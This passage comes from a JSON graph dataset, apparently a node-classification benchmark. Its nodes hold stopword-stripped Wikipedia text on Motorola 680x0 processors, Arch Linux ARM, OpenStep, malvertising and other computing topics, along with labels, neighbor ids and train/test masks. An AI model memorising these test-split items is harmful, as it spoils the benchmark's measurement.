telephone central office switch recently 68030 core also adapted freescale microcontroller embedded applications lecroy used 68ec030 certain models 9300 series digital oscilloscopes including “ c ” suffix models high performance 9300 series models along mega waveform processing hardware option 68020-based 9300 series models 68ec030 low cost version 68030 difference two 68ec030 omits on-chip memory management unit mmu thus essentially upgraded 68020 68ec030 used cpu low-cost model amiga 4000 number cpu accelerator cards commodore amiga line computers also used cisco systems 2500 series router small-to-medium enterprise computer internetworking appliance 50 mhz speed exclusive ceramic pga package plastic '030 stopped 40 mhz",
    "neighbors": [
      3844,
      4741,
      1158,
      4868,
      7302,
      7305,
      10501,
      3467,
      1548,
      11013,
      6415,
      7824,
      147,
      7830,
      6807,
      11286,
      2073,
      7065,
      8480,
      7842,
      7844,
      8102,
      6183,
      1576,
      7211,
      5297,
      6834,
      11314,
      1461,
      11447,
      8761,
      11066,
      6715,
      8893,
      1983,
      576,
      7104,
      1090,
      5058,
      8896,
      9665,
      10945,
      4807,
      3017,
      4810,
      8525,
      5711,
      336,
      1744,
      8530,
      3540,
      9044,
      8534,
      3932,
      8058,
      3936,
      6624,
      9312,
      7269,
      10601,
      7806,
      9964,
      8048,
      3185,
      6258,
      5235,
      10224,
      10357,
      7286,
      3319,
      1530,
      8700,
      1534
    ],
    "mask": "Train"
  },
  {
    "node_id": 7300,
    "label": 3,
    "text": "Arch_Linux_ARM:arch linux arm arch linux arm port arch linux arm processors design philosophy simplicity full control end user like parent operating system arch linux aims unix-like goal minimalism complete user control however make arch linux difficult linux beginners requires knowledge responsibility operating system arch linux arm based arch linux minimalist linux distribution first released march 11 2002 idea making single official port arch linux devices arm processors born members arch linux plugapps archmobile development teams notably mike staszel went found arch linux arm project kevin mihelich currently arch linux arm primary developer arch linux arm community-developed software development user support provided fully volunteer effort donations also unlike community-supported operating systems ubuntu arch linux arm relatively small user base making user participation development especially important arch linux arm rolling release cycle i.e new software packaged released bleeding edge release cycle small frequent package updates differs release cycles linux distributions debian focus large scheduled releases packages proven stable unlike arch linux aimed x86-64 cpus arch linux arm aimed low- high-end arm cpus low end support armv5 platforms like plug computers oxnas-based armv6 pogoplugs arch linux arm also supports many single-board computers raspberry pi beagleboard higher end support however arch linux arm run device supports armv5te armv6h armv7 armv8 instruction sets list officially supported platforms see archlinuxarm.org platforms page list unofficial community-supported devices see archlinuxarm.org community-supported devices forum arch linux arm gained popularity lightweight linux distribution 2014 growing popularity among single-board computer hobbyists arch linux arm also known good community support",
    "neighbors": [
      4673,
      7745,
      644,
      11396,
      392,
      4841,
      5067,
      5356,
      9964,
      7833,
      5397,
      11062,
      1849,
      6618,
      3835
    ],
    "mask": "None"
  },
  {
    "node_id": 7301,
    "label": 9,
    "text": "Euler_(software):euler software euler euler mathematical toolbox eumatht free open-source numerical software package contains matrix language graphical notebook style interface plot window euler designed higher level math calculus optimization statistics software handle real complex interval numbers vectors matrices produce 2d/3d plots uses maxima symbolic operations software compilable windows unix linux versions contain computer algebra subsystem euler math toolbox originated 1988 program atari st. time title program simply euler turned unspecific internet main aim program create tool testing numerical algorithms visualize results demonstrate mathematical content classroom euler math toolbox uses matrix language similar matlab system development since 1970s main developer euler rené grothmann mathematician catholic university eichstätt-ingolstadt germany 2007 euler married maxima computer algebra system symbolic expressions functions added communicate maxima reach good degree integration numerical euler core euler core numerical system written c/c++ handles real complex interval values matrices types available data types sparse compressed matrices long accumulator exact scalar product strings strings used expressions file names etc based core additional functions implemented euler matrix language interpreted programming language style advanced basic dialect euler contains libraries statistics exact numerical computations interval inclusions differential equations stiff equations astronomical functions geometry clean interface consists text window graphics window text window contains fully editable notebooks graphics window graphics output graphics added notebook window exported various formats png svg wmf clipboard graphic types include line bar point plots 2d 3d including anaglyph plots 3d surfaces 3d plots euler api use open raytracer pov-ray euler handles symbolic computations via maxima loaded separate process communicating euler pipes two programs exchange variables values indeed maxima used various euler functions e.g newton method assist computation derivatives taylor expansions integrals moreover maxima called definition time euler function latex used within euler display formulas export formulas html either generated latex images mathjax used special export option exports graphics svg euler also includes tiny c compiler allows subroutines c compiled included via windows dll euler lot similarity matlab free clones gnu octave compatible",
    "neighbors": [
      5129,
      3980,
      6797,
      15,
      8079,
      5148,
      7580,
      7326,
      10142,
      7341,
      9133,
      7983,
      6962,
      823,
      6718,
      2242,
      5830,
      5703,
      5833,
      11239,
      4840,
      363,
      7148,
      5741,
      5492,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7302,
    "label": 3,
    "text": "Motorola_68060:motorola 68060 motorola 68060 sixty-eight-oh-sixty 32-bit microprocessor motorola released 1994 successor motorola 68040 highest performing member 68000 series two derivatives produced 68lc060 68ec060 lc low-cost version without fpu ec embedded controller without mmu fpu 68060 design led joe circello 68060 shares architectural features p5 pentium similar superscalar in-order dual instruction pipeline configuration instruction decoder breaks complex instructions simpler ones execution however significant difference 68060 fpu pipelined therefore three times slower pentium floating point applications contrast integer multiplications bit shifting instructions significantly faster 68060 68060 ability execute simple instructions address generation unit agu thereby supply result two cycles alu development 68060 large amounts commercial compiled code analyzed clues instructions would best candidates performance optimization pentium 68060 perform better mixed code pentium decoder issue fp instruction every opportunity hence fpu superscalar alus 68060 non-pipelined fpu accept instruction issued one decoder means optimizing 68060 easier rules prevent fp instructions issued whenever convenient programmer well understood instruction latencies however properly optimized scheduled code pentium fpu capable double clock clock throughput 68060 fpu 68060 last development 68000 family general purpose use abandoned favor powerpc chips saw use late-model amiga machines amiga accelerator cards well atari st clones falcon accelerator board ct60/ct63/ct60e latter created 2015 late models alpha microsystems multiuser computers migration x86 apple inc. unix world moved onto various risc platforms time 68060 available 68060 introduced 50 mhz motorola 0.6 µm manufacturing process years later shrunk 0.42 µm clock speed raised 66 mhz 75 mhz developments basic core continue intended embedded systems combined number peripheral interfaces reduce overall complexity power requirements design number chips different sets interfaces sold names coldfire dragonball model numbers even second-to-last digit 68000 68020 68040 68060 reserved major revisions 680x0 core architecture model numbers odd second-to-last digit 68010 68030 reserved upgrades architecture previous chip 68050 68070 ever produced motorola example motorola 68010 obscure 68012 68000 improvements loop instruction ability suspend continue instruction event page fault enabling use virtual memory appropriate mmu hardware however major overhauls core architecture similarly motorola 68030 represents process improvement 68020 mmu small data cache 256 bytes moved on-chip 68030 released speed ratings 50 mhz jump 68000/68010 68020/68030 however represents major overhaul innumerable individual changes time 68060 production motorola abandoned development 68000 family favor powerpc 68060 last 68000 family processor motorola signetics philips produced 68000-based variant somewhat confusingly named 68070 contains modestly-improved 68000 cpu simple on-chip mmu i²c bus controller came long 68060 used principally embedded processor consumer electronics items notably cd-i consoles 68060 history american broadcast television graphics chyron max maxine series television character generators use 68060 main processor character generators fixture many american television networks affiliate stations desktops 68060 used variants amiga 4000t produced amiga technologies available third party upgrade amiga models also used amiga clone draco non-linear video system q60 extended sinclair ql design similarly slowest start ultimate pace 68k architecture capabilities 68060-based motherboards—at 66 mhz full 68060 non-fpu 68lc060 option overclocked 80 mhz—are 100 times faster sinclair ql running operating systems 68060 used nortel meridian 1 option 51 61 81 large office pbx systems powering cp3 cp4 core processor boards pair boards sporting 68060 could used make pbx fault tolerant logical application previous meridian 1 cores used motorola chips nortel later changed architecture use intel processors motorola vanguard 6560 multiprotocol router uses 50 mhz 68ec060 processor motorola mvme-17x force computer sys68k vmebus systems use 68060 cpu 68ec060 version motorola 68060 microprocessor intended embedded controllers ec differs 68060 neither fpu mmu makes less expensive draws less power 68lc060 low cost version motorola 68060 microprocessor fpu makes less expensive draws less power atc address translation cache",
    "neighbors": [
      7299,
      3844,
      4868,
      1158,
      7302,
      10501,
      7305,
      3467,
      1548,
      6415,
      8851,
      11539,
      2073,
      7065,
      6815,
      8102,
      6187,
      5297,
      11314,
      1461,
      1463,
      11447,
      8761,
      6715,
      1983,
      10945,
      3017,
      2638,
      4046,
      336,
      8530,
      3540,
      3932,
      3936,
      7269,
      10601,
      9964,
      10734,
      1776,
      3185,
      4465,
      5235,
      5492,
      8048,
      7286,
      3319,
      10224,
      8058,
      8700,
      8190
    ],
    "mask": "None"
  },
  {
    "node_id": 7303,
    "label": 7,
    "text": "History_of_computer_clusters:history computer clusters history computer clusters best captured footnote greg pfister search clusters “ virtually every press release dec mentioning clusters says ‘ dec invented clusters ... ’ ibm invent either customers invented clusters soon could fit work one computer needed backup date first unknown would surprising 1960s even late 1950s. ” formal engineering basis cluster computing means parallel work sort arguably invented gene amdahl ibm 1967 published come regarded seminal paper parallel processing amdahl law amdahl law describes mathematically speedup one expect parallelizing given otherwise serially performed task parallel architecture article defined engineering basis multiprocessor computing cluster computing primary differentiator whether interprocessor communications supported inside computer example customized internal communications bus network outside computer commodity network consequently history early computer clusters less directly tied history early networks one primary motivations development network link computing resources creating de facto computer cluster packet switching networks conceptually invented rand corporation 1962 using concept packet switched network arpanet project succeeded creating 1969 arguably world first commodity-network based computer cluster linking four different computer centers something cluster right probably commodity cluster arpanet project grew internet—which thought mother computer clusters union nearly compute resources including clusters happen connected also established paradigm use computer clusters world today—the use packet-switched networks perform interprocessor communications processor sets located otherwise disconnected frames development customer-built research clusters proceeded hand hand networks unix operating system early 1970s tcp/ip xerox parc project created formalized protocols network-based communications hydra operating system built cluster dec pdp-11 minicomputers called c.mmp carnegie mellon university 1971 however circa 1983 protocols tools easily remote job distribution file sharing defined largely within context bsd unix implemented sun microsystems hence became generally available commercially along shared filesystem first commercial clustering product arcnet developed datapoint 1977 arcnet commercial success clustering per se really take digital equipment corporation released vaxcluster product 1984 vax/vms operating system arcnet vaxcluster products supported parallel computing also shared file systems peripheral devices idea provide advantages parallel processing maintaining data reliability uniqueness vaxcluster vmscluster still available openvms systems hp running alpha itanium systems two noteworthy early commercial clusters tandem himalaya circa 1994 high-availability product ibm s/390 parallel sysplex also circa 1994 primarily business use history commodity computer clusters would complete without noting pivotal role played development parallel virtual machine pvm software 1989 open source software based tcp/ip communications enabled instant creation virtual supercomputer—a high performance compute cluster—made tcp/ip connected systems free-form heterogeneous clusters built top model rapidly achieved total throughput flops greatly exceeded available even expensive big iron supercomputers pvm advent inexpensive networked pcs led 1993 nasa project build supercomputers commodity clusters 1995 beowulf cluster—a cluster built top commodity network specific purpose supercomputer capable performing tightly coupled parallel hpc computations—was invented spurred independent development grid computing named entity although grid-style clustering around least long unix operating system arpanet whether clusters used named",
    "neighbors": [
      9665,
      9762,
      5956,
      1606,
      5384,
      330,
      10733,
      5492,
      11604,
      2422,
      3323,
      9151
    ],
    "mask": "None"
  },
  {
    "node_id": 7304,
    "label": 4,
    "text": "Malvertising:malvertising malvertising portmanteau malicious advertising use online advertising spread malware typically involves injecting malicious malware-laden advertisements legitimate online advertising networks webpages online advertisements provide solid platform spreading malware significant effort put order attract users sell advertise product advertising content inserted high-profile reputable websites malvertising provides malefactors opportunity push attacks web users might otherwise see ads due firewalls safety precautions like malvertising attractive attackers 'can easily spread across large number legitimate websites without directly compromising websites malvertising fairly new concept spreading malware even harder combat work way webpage spread system unknowingly interesting thing infections delivered malvertising require user action like clicking compromise system exploit vulnerabilities website server hosted ... infections delivered malvertising silently travel web page advertisements able expose millions users malware even cautious growing rapidly 2012 estimated nearly 10 billion ad impressions compromised malvertising attackers wide reach able deliver attacks easily advertisement networks companies websites difficulty diminishing number malvertising attacks suggests attack vector ’ likely disappear soon websites web publishers unknowingly incorporate corrupted malicious advertisement page computers become infected pre-click post click misconception infection happens visitors begin clicking malvertisement examples pre-click malware include embedded main scripts page drive-by-downloads malware also auto-run case auto redirects user automatically taken different site could malicious malware also found delivery ad – clean ad malware pre post click build design still infected whilst called malicious code hide undetected user idea coming way post-click malvertisement example user clicks ad visit advertised site instead directly infected redirected malicious site sites trick users copying viruses spyware usually disguised flash files popular web redirection often built online advertising spread malware often successful users expect redirection happen clicking advertisement redirection taking place needs co-opted order infect user computer malvertising often involves exploitation trustworthy companies attempting spread malware place clean advertisements trustworthy sites first order gain good reputation later insert virus spyware code behind ad mass virus infection produced remove virus thus infecting visitors site time period identities responsible often hard trace making hard prevent attacks stop altogether ad network infrastructure complex many linked connections ads click-through destinations malvertisements infect vulnerable computer even user never clicks normal-appearing advertisement 2007/2008 first recorded sighting malvertising late 2007 early 2008 threat based vulnerability adobe flash something continued day – see later affected number platforms including myspace excite rhapsody 2009 online edition new york times magazine found serving ad part larger click fraud scam created botnet network malware infected computers nicknamed bahama botnet went used carry click fraud pay per click ads web banner feed new york times hacked weekend september 11 14 causing readers see advertisements telling systems infected trying trick installing rogue security software computers according spokeswoman diane mcnulty culprit approached newspaper national advertiser provided apparently legitimate ads week ads switched virus alert malvertisement afterwards new york times suspended third-party advertisements address problem even posted advice readers regarding issue technology blog 2010 malvertising takes marketing analysts clickz noted online trust alliance ota identified billions display ads across 3500 sites carrying malware year online trust alliance formed cross industry anti-malvertising task force 2011 spotify malvertising attack used blackhole exploit kit – one first instances drive-by download user ’ even click ad become infected malware according bluecoat security systems report 2011 saw increase 240 malvertising based malicious sites 2012 symantec includes malvertising section internet security threat report 2013 looked back landscape 2012 symantec used scanning software across series websites detected half infected malvertising 2012 la times hit massive malvertising attack used blackhole exploit kit infect users seen part general campaign malvertising hit large news portals – strategy carried subsequent years attacks huffingtonpost.com ny times 2013 major malvertising campaign waged yahoo.com one largest ad platforms monthly visits 6.9 billion malware exploit based commonly used web attack cross-site scripting xss number three top ten web attacks types identified open web application security project owasp attack infected users machines ransomware ‘ cryptowall ’ type malware extorts money users encrypting data placing ransom 1000 bitcoins paid 7 days decrypt data 2014 2014 major malvertising campaigns doubleclick zedo ad networks various news portals including times israel hindustan times affected previous attacks cybercrime involved cryptowall malware infection spate malvertising believed brought 1 million ransom money infecting 600,000 computers 2015 mcafee threat report february 2015 said malvertising growing quickly mobile platforms 2015 malvertising campaigns ebay answers.com talktalk.co.uk wowhead.com among others campaigns involved breaches ad networks including doubleclick engage bdr also report possibly first political malvertising campaign pro-russian activists based botnet forced users machines visit bogus sites generated ad revenue activists users also ended several pro-russian propaganda videos several popular websites news sources victims malvertising malicious advertisements placed webpages widgets unknowingly including horoscope.com new york times london stock exchange spotify onion visiting websites affected malvertising users risk infection many different methods used injecting malicious advertisements programs webpages several precautions people take lessen chances getting tricked advertisements commonly used programs adobe flash player adobe reader flaws exploited become vulnerable attacks important avoid least keep date users also download anti-virus software protects threats removes malicious software systems users also push companies websites scan advertisements making active webpages users also use ad blocking software avoid downloading malware contained advertisements specific browser extension alerting malvertising campaigns",
    "neighbors": [
      704,
      5536,
      9922,
      3555,
      8387,
      4165,
      4198,
      10368,
      877,
      1970,
      2611,
      5012,
      11159,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 7305,
    "label": 3,
    "text": "Motorola_68040:motorola 68040 motorola 68040 sixty-eight-oh-forty 32-bit microprocessor motorola released 1990 successor 68030 followed 68060 68050 keeping general motorola naming 68040 often referred simply '040 pronounced oh-four-oh oh-forty apple macintosh computers 68040 introduced macintosh quadra named chip fastest 68040 processor clocked 40 mhz used quadra 840av expensive models short-lived macintosh centris line also used 68040 cheaper quadra centris macintosh performa used 68lc040 68040 also used personal computers amiga 4000 amiga 4000t well number workstations alpha microsystems servers hp 9000/400 series later versions next computer 68040 first 680x0 family member on-chip floating-point unit fpu thus included functionality previously required external chips namely fpu memory management unit mmu added 68030 also split instruction data caches 4 kilobytes fully pipelined six stages unfortunately 68040 ran transistor budget limit early design mmu take many transistors—indeed die cpu actually saved transistors—the fpu certainly motorola 68882 external fpu known high performance unit motorola wish risk integrators using lc version 68882 instead profitable full rc unit information motorola multiprocessing model 680x0 series see motorola 68020 fpu 68040 thus made incapable ieee transcendental functions supported 68881 68882 used popular fractal generating software time little else motorola floating point support package fpsp emulated instructions software interrupt exception handler heavy use transcendental functions caused severe performance penalties heat always problem throughout 68040 life delivered four times per-clock performance 68020 68030 chip complexity power requirements came large die large caches affected scaling processor never able run clock rate exceeding 40 mhz 50 mhz variant planned canceled overclocking enthusiasts reported success reaching 50 mhz using 100 mhz oscillator instead 80 mhz part novel technique adding oversized heat sinks fans 68040 offered features intel 80486 clock-for-clock basis could significantly outperform intel chip integer floating point instructions however 80486 ability clocked significantly faster without suffering overheating problems late 1991 higher-end macintosh desktop lineup transitioned '040 apple unable offer newer processor top-of-the-line powerbooks early 1994 powerbooks restricted 68030s several years macworld reviewers conceded best choice power users pc-compatible texas instruments 80486 notebook rather top-of-the-line powerbook 180 versions 68040 created specific market segments including 68lc040 removed fpu 68ec040 removed fpu mmu motorola intended ec variant embedded use embedded processors 68040 time need power 68040 ec variants 68020 68030 continued common designs motorola produced several speed grades 16 mhz 20 mhz parts never qualified xc designation used prototyping samples 25 mhz 33 mhz grades featured across whole line around 2000 40 mhz grade full 68040 planned 50 mhz grade canceled exceeded thermal design envelope information instructions architecture see motorola 68000 68ec040 version motorola 68040 microprocessor intended embedded controllers ec differs 68040 neither fpu mmu makes less expensive draws less power 68ec040 used cisco switch supervisor engine heart models 2900 2948g 2980g 4000 4500 5000 5500 6000 6500 7600 68lc040 low cost version motorola 68040 microprocessor fpu makes less expensive draws less power although cpu fits feature chart like motorola 68030 continues include 68040 caches pipeline thus significantly faster 68030 mask revisions 68lc040 contained bug prevents chip operating correctly software fpu emulator used according motorola errata chip mask set 2e71m later contain bug new mask introduced mid-1995 converted 68lc040 chip mc status buggy revisions typically found 68lc040-based apple macintosh computers chips mask set 2e23g used lc 475 confirmed faulty fault relates pending writes lost f-line exception triggered 68040 update microcode manner modern x86 chips means way use software requires floating-point functionality replace buggy 68lc040 later revision full 68040 atc address translation cache",
    "neighbors": [
      7299,
      3844,
      4868,
      1158,
      7173,
      7302,
      3977,
      7305,
      3467,
      1548,
      6283,
      10501,
      4879,
      5264,
      6415,
      2839,
      2073,
      7065,
      8222,
      7842,
      8102,
      5297,
      11314,
      1461,
      10365,
      11447,
      1592,
      8761,
      6715,
      8893,
      1983,
      576,
      10945,
      5058,
      3017,
      8523,
      2638,
      336,
      8530,
      3540,
      6100,
      10840,
      8665,
      3932,
      350,
      3936,
      6624,
      9952,
      869,
      7269,
      10601,
      9964,
      4334,
      10734,
      5616,
      3185,
      6130,
      5235,
      8048,
      8700,
      7286,
      3319,
      8190,
      10224,
      8058,
      4220,
      7549,
      7806
    ],
    "mask": "Test"
  },
  {
    "node_id": 7306,
    "label": 4,
    "text": "BigFix_Inc:bigfix inc bigfix inc. american company focusing managing networked desktop mobile server computers origins personal computer self-help application company ’ products expanded on-demand endpoint management services include asset inventory/discovery security vulnerability detection remediation software distribution information technology compliance reporting patch management software license management security policy enforcement endpoint device power consumption management founded 1997 bigfix inc. headquartered emeryville california july 1 2019 hcl technologies completed acquisition bigfix ibm previously acquired bigfix undisclosed amount ibm changed name bigfix product ibm tivoli endpoint manager tem shortened name ibm endpoint manager iem 2013 ibm changed name back ibm bigfix july 7 2015 bigfix inc. founded david hindawi david donoho april 1997 emeryville california company ’ initial product user self-service system management application marketed oem pc manufacturers 2002 company developed bigfix software company-wide networked desktop mobile server computer management shifted focus company consumer enterprise markets initial uses centered security patch management identified significant pain point time enterprise departments 2007 bigfix expanded specific management areas security threat suppression bigfix endpoint protection enterprise security configuration management bigfix security configuration vulnerability management enterprise systems management bigfix systems lifecycle management 2009 bigfix entered exclusive partnership trend micro markets included banking financial services manufacturing government education healthcare customers included pitney bowes stanford university suntrust bank miami-dade county public schools us department energy july 20 2010 ibm acquired bigfix inc. approximately 400 million integrated bigfix product tivoli software portfolio new name ibm tivoli endpoint manager tem march 5 2013 ibm tivoli endpoint manager renamed ibm became ibm endpoint manager iem july 7 2015 ibm changed name ibm endpoint manager back ibm bigfix december 7 2018 hcl technologies announced acquisition ibm bigfix acquisition closed july 1 2019",
    "neighbors": [
      1282,
      3323,
      9850,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 7307,
    "label": 2,
    "text": "OpenStep:openstep openstep defunct object-oriented application programming interface api specification legacy object-oriented operating system basic goal offering nextstep-like environment non-nextstep operating systems openstep principally developed next sun microsystems allow advanced application development sun operating systems specifically solaris next produced version openstep mach-based unix stylized openstep well version windows nt software libraries shipped openstep superset original openstep specification including many features original nextstep taligent considered venerable competitor operating system object markets microsoft cairo least consideration even without product releases either taligent theoretical newness often compared next older mature commercially established platform sun microsystems held exploratory meetings taligent deciding upon building object application framework openstep partnership next preemptive move taligent cairo bud tribble founding designer macintosh nextstep sunsoft vice president object products lead decision included 10 million investment sun next deal described first unadulterated piece good news next community last four years openstep api created result 1993 collaboration next sun microsystems allowing cut-down version nextstep operating system object layers run sun solaris operating system specifically solaris sparc-based hardware openstep effort strip away portions nextstep depended mach next-specific hardware present resulted smaller system consisted primarily display postscript objective-c runtime compilers majority nextstep objective-c libraries included basic operating system lower-level display system steve jobs said ahead today race far ... 1996 cairo close behind taligent far behind sun ceo scott mcnealy said insurance policy made firm one-company one-architecture decision like taligent getting trophy spouse signing hp first draft api published next mid 1994 later year released openstep compliant version nextstep openstep supported several platforms well sun sparc systems next submitted openstep specification industry object standards bodies official openstep api published september 1994 first split api foundation application kit first use ns prefix early versions nextstep use nx prefix contain application kit relying standard unix libc types low-level data structures openstep remained next primary operating system product purchased apple computer 1997 openstep combined technologies existing classic mac os produce mac os x. iphone ipad ios also descendant openstep targeted touch devices sun originally adopted openstep environment intent complementing sun corba-compliant object system solaris neo formerly known project doe providing object-oriented user interface toolkit complement object-oriented corba plumbing port involved integrating openstep appkit display postscript layer sun x11 server making appkit tolerant multi-threaded code project doe inherently heavily multi-threaded implementing solaris daemon simulate behavior mach ports extending sunpro c++ compiler support objective-c using next objc runtime writing x11 window manager implement nextstep look feel much possible integrating next development tools project builder interface builder sunpro compiler order provide complete end-user environment sun also ported nextstep-3.3 versions several end-user applications including mail.app preview.app edit.app workspace manager dock openstep corba parts products later split neo released late 1995 without openstep environment march 1996 sun announced joe product integrate neo java sun shipped beta release openstep environment solaris july 22 1996 made freely available download august 1996 non-commercial use sale september 1996 openstep/solaris shipped sparc architecture openstep differs nextstep various ways openstep api specification defines three major components foundation kit software framework application kit gui graphics front-end display postscript 2d graphics system drawing windows graphics screen standardization openstep also allowed creation several new library packages delivered openstep platform unlike operating system whole packages designed run stand-alone practically operating system idea use openstep code basis network-wide applications running across different platforms opposed using corba system primary among packages portable distributed objects pdo pdo essentially even stripped version openstep containing foundation kit technologies combined new libraries provide remote invocation little code unlike openstep defined operating system applications would run pdo libraries compiled application creating stand-alone native application particular platform pdo small enough easily portable versions released major server vendors mid-1990s next staff took writing solutions various corba magazine articles lines code whereas original article would fill several pages even though using pdo required installation considerable amount supporting code objective-c libraries pdo applications nevertheless considerably smaller similar corba solutions typically one-half one-third size similar d'ole provided types services presented resulting objects com objects goal allowing programmers create com services running high-powered platforms called microsoft windows applications instance one could develop high-powered financial modeling application using d'ole call directly within microsoft excel d'ole first released ole communicated applications running single machine pdo enabled next demonstrate excel talking microsoft applications across network microsoft able implement functionality dcom another package developed openstep enterprise objects framework eof tremendously powerful time object-relational mapping product eof became popular enterprise market notably financial sector openstep caused something minor revolution next first operating system nextstep sophisticated mach-unix based operating system originally ran next motorola 68k-based workstations ported run 32-bit intel x86-based ibm-compatible personal computers pa-risc-based workstations hewlett-packard sparc-based workstations sun microsystems next completed implementation openstep existing mach-based os called openstep mach 4.0 july 1996 4.1 december 1996 4.2 january 1997 intents nextstep 4.0 still retained flagship nextstep technologies dps unix underpinnings user interface characteristics like dock shelf retained classic nextstep user interface styles openstep mach improved comparison nextstep 3.3 vastly improved driver support – however environment actually write drivers changed introduction object-oriented driverkit openstep mach supported intel x86-based pc sun sparc workstations next 68k-based architectures hp pa-risc version dropped versions continued run underlying mach-based os used nextstep openstep mach became next primary os 1995 used mainly intel platform addition complete openstep implementation system delivered complete set nextstep libraries backward compatibility easy thing openstep due library versioning openstep suffer bloat addition openstep mach port sparc sun next developed openstep compliant set frameworks run sun solaris operating system developing solaris openstep sun lost interest openstep shifted attention toward java virtual machine development environment java served direct competitor openstep next also delivered implementation running top windows nt 4.0 called openstep enterprise often abbreviated ose unintentional demonstration true nature portability programs created openstep specification programs openstep mach could ported ose little difficulty allowed existing customer base continue using tools applications running windows many process switching never clean match ui perspective probably due openstep routing window graphics display postscript server—which also ported windows—ose nevertheless managed work fairly well extended openstep commercial lifespan openstep ose two revisions one major one never released next purchased apple 1997 acquiring next apple intended ship rhapsody reworked version openstep mach mac standard pcs rhapsody openstep mach copland appearance mac os 8 support java apple technologies including colorsync quicktime could regarded openstep 5 two developer versions rhapsody released known developer preview 1 2 ran limited subset intel powerpc hardware mac os x server 1.0 first commercial release operating system delivered exclusively powerpc mac hardware replacing display postscript windowserver quartz responding developers including better backward compatibility classic mac os applications addition carbon apple released mac os x mac os x server starting version 10.0 mac os x named macos macos primary programming environment essentially openstep certain additions xml property lists url classes internet connections macos ports development libraries tools called cocoa macos since become single popular desktop unix-like operating system world although macos longer openstep compliant operating system gnustep free software implementation next libraries began time nextstep predating openstep openstep ose purchased apple effectively ended commercial development implementing openstep platforms gnustep ongoing open source project aiming create portable free software implementation cocoa/openstep libraries gnustep also features fully functional development environment reimplementations newer innovations macos cocoa framework well extensions api",
    "neighbors": [
      9732,
      5677,
      8754,
      9784,
      8767,
      576,
      8774,
      6234,
      9308,
      3167,
      8303,
      8304,
      2676,
      7806,
      1666,
      2179,
      8844,
      6797,
      11420,
      11426,
      10406,
      168,
      3241,
      5292,
      5294,
      3248,
      11440,
      3250,
      11447,
      3286,
      4310,
      10470,
      6377,
      2282,
      9452,
      8944,
      242,
      2804,
      11513,
      8441,
      9467,
      9986,
      2819,
      5380,
      5384,
      8976,
      5397,
      5921,
      3371,
      6958,
      1839,
      7983,
      7991,
      2363,
      10052,
      350,
      5492,
      9589,
      1399,
      7561,
      10122,
      6539,
      3990,
      6554,
      11171,
      11689,
      4544,
      9665,
      7640,
      3038,
      5600,
      5093,
      3563,
      6129,
      499,
      5619,
      11257,
      2556
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7308,
    "label": 9,
    "text": "PLEXIL:plexil plexil plan execution interchange language open source technology automation created currently development nasa plexil programming language representing plans automation 2006 vandi verma one several co-writers plexil used automation technologies nasa k10 rover mars curiosity rover percussion drill deep space habitat habitat demonstration unit edison demonstration smallsat networks ladee autonomy operating system aos procedure automation international space station plexil executive execution engine implements plexil interfaced using provided software framework external systems controlled and/or queried plexil used demonstrate automation technologies targeted future nasa space missions binaries documentation widely available open source sourceforge.net fundamental programming unit plexil node node data structure formed two primary components set conditions drive execution node another set specifies node accomplishes execution hierarchical composition nodes called plan plan tree divided nodes close root high level nodes leaf nodes represent primitive actions variable assignments sending commands external system node types september 2008 nasa implemented seven types nodes node states node one state nodes transitions",
    "neighbors": [
      9345,
      8262,
      11625,
      4782,
      7983,
      5680,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 7309,
    "label": 5,
    "text": "Video_Acceleration_API:video acceleration api video acceleration api va api royalty-free api well implementation free open-source library libva distributed mit license va api implemented device drivers offer end-user software vlc media player gstreamer access available video acceleration hardware purevideo libva-vdpau driver implements va api terms vdpau unified video decoder api enables provides access hardware-accelerated video processing using hardware graphics processing units gpu accelerate video encoding decoding offloading processing central processing unit cpu va api video decode/encode interface platform window system independent primarily targeted direct rendering infrastructure dri x window system unix-like operating systems including linux freebsd solaris android however potentially also used direct framebuffer graphics sub-systems video output accelerated processing includes support video decoding video encoding subpicture blending rendering va api specification originally designed intel gma graphics media accelerator series gpu hardware specific purpose eventually replacing xvmc standard default unix multi-platform equivalent microsoft windows directx video acceleration dxva api today api longer limited intel-specific hardware gpus hardware manufacturers freely use open standard api hardware accelerated video processing hardware without paying royalty fee main motivation va api enable hardware-accelerated video decode various entry-points vld idct motion compensation deblocking prevailing coding standards today mpeg-2 mpeg-4 asp/h.263 mpeg-4 avc/h.264 h.265/hevc vc-1/wmv3 extending xvmc considered due original design mpeg-2 motioncomp made sense design interface scratch fully expose video decode capabilities today gpus january 17 2012 va api natively supported va api currently supports video codecs official mainline version note exactly video codecs supported depends hardware driver capabilities video decoding post-processing processes offloaded accelerated device drivers gpu hardware supports current interface window system independent potentially used graphics sub-systems dri direct rendering infrastructure x window system direct framebuffer work third-party drm direct rendering manager libraries nutshell scheme pass various types data buffers application gpu decoding encoding compressed bit-stream",
    "neighbors": [
      9223,
      5386,
      2955,
      7442,
      10658,
      8995,
      4902,
      6694,
      429,
      8621,
      7983,
      1842,
      3764,
      823,
      11322,
      9151,
      6981,
      3537,
      3033,
      11485,
      1770,
      5867,
      1644,
      8682,
      8685,
      9579,
      1776,
      2804,
      5492,
      8438,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7310,
    "label": 1,
    "text": "Butler_SQL:butler sql butler sql now-defunct sql-based database server classic mac os everyware development much history partnered another everyware product tango built dynamic database pages sql data product eventually ended pervasive software although longer sold butler introduced take advantage new mac os component known data access manager dam similar concept odbc allowing end-user client programs access various data sources dam however worked lower level odbc contain inherent query language address concern single dam program might want work different back-end databases apple used second system known data access language dal variant sql included additional flow-control data manipulation instructions dal queries converted target database using adaptor server butler written natively support dal variant sql use dam internally support networking avoided several intermediary layers would required use queries database servers butler 2.0 released may 1996 added direct odbc links well butler suffered performance problems due single-user nature mac os particular file access single-threaded multitasking coordinated applications operating system",
    "neighbors": [
      10413,
      10518
    ],
    "mask": "None"
  },
  {
    "node_id": 7311,
    "label": 3,
